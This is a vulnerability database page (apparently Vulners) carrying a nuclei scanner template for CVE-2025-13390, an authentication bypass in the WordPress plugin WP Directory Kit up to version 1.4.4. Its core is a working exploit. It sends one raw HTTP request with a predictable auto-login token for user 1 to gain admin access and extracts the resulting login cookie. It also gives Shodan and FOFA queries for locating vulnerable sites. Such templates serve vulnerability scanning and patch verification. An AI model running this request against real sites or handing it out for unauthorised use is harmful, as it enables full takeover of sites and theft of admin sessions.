Lucene search
+L

WP Directory Kit <= 1.4.4 - Authentication Bypass

🗓️ 11 Sep 2026 05:22:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

WP Directory Kit 1.4.4 and earlier allows unauthenticated admin access via a token.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for Incorrect Implementation of Authentication Algorithm in Wpdirectorykit Wp_Directory_Kit
5 Jan 202618:45
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2025-13390
20 Nov 202501:45
githubexploit
circl
Circl
CVE-2025-13390
3 Dec 202515:28
circl
cnnvd
CNNVD
WordPress plugin WP Directory Kit 安全漏洞
3 Dec 202500:00
cnnvd
cve
CVE
CVE-2025-13390
3 Dec 202513:52
cve
cvelist
Cvelist
CVE-2025-13390 WP Directory Kit <= 1.4.4 - Authentication Bypass to Privilege Escalation via Account Takeover
3 Dec 202513:52
cvelist
euvd
EUVD
EUVD-2025-200972
3 Dec 202513:52
euvd
kitploit
Kitploit
CVE-2025-13390
10 Sep 202612:38
kitploit
kitploit
Kitploit
CVE-2025-13390
10 Sep 202617:15
kitploit
nvd
NVD
CVE-2025-13390
3 Dec 202514:15
nvd
Rows per page
id: CVE-2025-13390

info:
  name: WP Directory Kit <= 1.4.4 - Authentication Bypass
  author: maxthepm
  severity: critical
  description: |
    The WP Directory Kit plugin for WordPress version 1.4.4 and below contains an authentication bypass vulnerability in its auto-login functionality. The vulnerability allows unauthenticated attackers to gain administrative access by exploiting a cryptographically weak token generation mechanism that uses only the first 10 characters of MD5(user_id). For user_id=1 (typically admin), the token is always predictable.
  impact: |
    Unauthenticated attackers can gain administrative access, leading to full site takeover.
  remediation: |
    Update to the latest version beyond 1.4.4.
  reference:
    - https://plugins.trac.wordpress.org/browser/wpdirectorykit/trunk/actions.php#L116
    - https://ryankozak.com/posts/cve-2025-13390/
    - https://github.com/d0n601/CVE-2025-13390
    - https://nvd.nist.gov/vuln/detail/CVE-2025-13390
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 10.0
    cve-id: CVE-2025-13390
    epss-score: 0.04593
    epss-percentile: 0.91092
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"/wp-content/plugins/wpdirectorykit"
    fofa-query: "body:/wp-content/plugins/wpdirectorykit"
  tags: cve,cve2025,wordpress,wp,wp-plugin,auth-bypass,wpdirectorykit,vkev

http:
  - raw:
      - |
        GET /?auto-login=1&user_id=1&token=c4ca4238a0 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "wordpress_logged_in_"
        case-insensitive: true

      - type: word
        part: header
        words:
          - "Set-Cookie"
        case-insensitive: true

      - type: status
        status:
          - 302

    extractors:
      - type: kval
        part: header
        kval:
          - set_cookie
# digest: 4a0a0047304502206ea1e5afd1a25d460f1daba99160c1a245a19b32573bd2f7e96c0edc865be87b022100a28df652c1d4cf62dc6464bbd0b2261e3dc1e7816a65ed6d69bd4406942631ef:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2026 14:48Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8 - 10
EPSS0.04593
SSVC
41